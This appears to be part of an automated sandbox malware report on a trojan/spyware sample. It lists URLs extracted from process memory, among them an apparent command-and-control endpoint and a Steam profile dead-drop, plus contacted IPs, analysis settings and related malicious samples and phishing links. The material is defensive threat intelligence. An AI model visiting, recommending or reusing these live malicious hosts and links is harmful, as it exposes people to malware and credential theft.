                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.youtube.comBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.google.comBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://villagedguy.cyou/apibuBitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2032771167.0000000002D1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://villagedguy.cyou:443/apiBitLockerToGo.exe, 00000002.00000003.1998002889.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://villagedguy.cyou/BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://www.gnu.org/gethelp/libidn2-0.dll.0.drfalse
                                                                              		unknown
                                                                              https://s.ytimg.com;BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=I6RUPT-G-voT&ampBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://steam.tv/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://www.gnu.org/software/libidn/#libidn2libidn2-0.dll.0.drfalse
                                                                                        		unknown
                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://sketchfab.comBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://lv.queniujq.cnBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.color.org)Qt5GuiVBox.dllfalse
                                                                                                    		unknown
                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://www.youtube.com/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://villagedguy.cyou/api~VlBitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://support.microsofBitLockerToGo.exe, 00000002.00000003.1924301094.0000000005090000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.google.com/recaptcha/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://checkout.steampowered.com/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://gnu.org/licenses/gpl.htmllibidn2-0.dll.0.drfalse
                                                                                                                  		unknown
                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.gnu.org/software/libidn/#libidn2Libidn2Generallibidn2-0.dll.0.drfalse
                                                                                                                      		unknown
                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://store.steampowered.com/;BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engliBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://store.steampowered.com/about/BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://community.cloudflare.steamstatic.com/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://villagedguy.cyou/api0BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://help.steampowered.com/en/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://steamcommunity.com/market/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://store.steampowered.com/news/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://www.gnu.org/gethelp/exebatcmdcomlibidn2-0.dll.0.drfalse
                                                                                                                                    		unknown
                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuXBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://store.steampowered.com/stats/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englisBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://medal.tvBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://api.zitadel.ch/assets/v1/avatar-32432jkh4kj32Imperial_Delay.exefalse
                                                                                                                                                		unknown
                                                                                                                                                https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://villagedguy.cyou/apiOBitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010533759.0000000002D1C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010643755.0000000002D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=xYs7BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://x1.c.lencr.org/0BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://x1.i.lencr.org/0BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://villagedguy.cyou/apiobBitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.virtualbox.org/VBoxProxyStub-x86.dll.0.drfalse
                                                                                                                                                                  		unknown

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  104.102.49.254
                                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                                  		16625AKAMAI-ASUStrue
                                                                                                                                                                  104.21.32.196
                                                                                                                                                                  		villagedguy.cyouUnited States
                                                                                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1545779
                                                                                                                                                                  Start date and time:2024-10-31 01:04:08 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 5m 47s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:6
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:HLZwUhcJ28.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:4b93cf26d6e6c52e332e084f0940c5e687a91b08e66ee822aae302d1b1f3c014.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@5/13@10/2
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 96%
                                                                                                                                                                  • Number of executed functions: 87
                                                                                                                                                                  • Number of non-executed functions: 119
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Stop behavior analysis, all processes terminated

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target Imperial_Delay.exe, PID 1136 because there are no executed function
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • VT rate limit hit for: HLZwUhcJ28.exe

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  20:05:20API Interceptor11x Sleep call for process: BitLockerToGo.exe modified

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                                                                                  104.21.32.196z5DptXNeB1.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                  • ideshowsx.xyz/ide/five/fre.php

                                                                                                                                                                  Domains

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  burlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  burlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  buNtKcYHCa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  yt5xqAvHnZ.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254

                                                                                                                                                                  ASNs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  AKAMAI-ASUShttps://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                                                                                                                                  • 184.28.90.27
                                                                                                                                                                  V6QED2Q1WBYVOPEGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.46.224.247
                                                                                                                                                                  https://irs-ci.secureemailportal.com/s/e?m=ABDvX2xiE1DvdsTP333wt4Qp&c=ABDsD05ZNJ23bCjfjm6gXjJS&em=publicrecords%40marionfl.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 2.19.126.211
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 23.47.50.173
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  https://apollomicsinc-my.sharepoint.com/:u:/p/peony_yu/EThcAjzaTWNPs4NpIP1X0v0BUe4pmKNB9s6TANBDk5EDeA?rtime=8VndtY_33EgGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.38.98.68
                                                                                                                                                                  https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 184.28.89.220
                                                                                                                                                                  https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.102.34.86
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  CLOUDFLARENETUShttps://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                                                                                                                                  • 104.26.0.231
                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  http://hprus.conegutsud.com.pe/4zgrHK17910PyfC1508dysnmxbczx27005OLWUIBMTRFCEVBH25578NWDJ17331m12#2mzdvgfkgua042eh8kky7aanhr5dggelvb8fjk5yz6jna8o8e5Get hashmaliciousPhisherBrowse
                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.26.0.100
